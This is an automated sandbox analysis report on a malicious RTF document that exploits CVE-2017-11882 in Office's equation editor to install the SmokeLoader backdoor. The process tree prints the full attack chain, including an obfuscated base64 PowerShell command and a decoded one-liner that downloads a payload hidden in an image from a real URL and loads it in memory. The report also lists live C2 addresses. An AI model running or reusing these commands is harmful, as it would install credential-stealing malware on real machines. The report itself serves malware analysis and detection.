Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
Analysis ID:1502248
MD5:1131d758c8208af277e943f04339e646
SHA1:030adac1abc31aa8bc3a22dda63c4a005aee6e88
SHA256:eb8381b156aad734ef3a0328b4985ed1edeca1c8d79d66e094598f8c6992ac71
Tags:rtf
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Maps a DLL or memory area into another process
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3312 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 4056 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 4080 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 2480 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 1872 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 2772 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 2840 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 2836 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 2704 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 2460 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • EQNEDT32.EXE (PID: 3876 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3988 cmdline: taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • gwseuha (PID: 4020 cmdline: C:\Users\user\AppData\Roaming\gwseuha MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1479:$obj2: \objdata
  • 0x1461:$obj3: \objupdate
  • 0x143d:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 9 entries

